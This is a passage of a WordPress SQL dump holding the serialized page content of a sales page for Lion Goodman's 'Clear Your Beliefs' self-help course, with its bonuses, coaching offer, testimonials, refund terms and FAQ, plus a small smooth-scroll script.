alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1885, 2170, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: 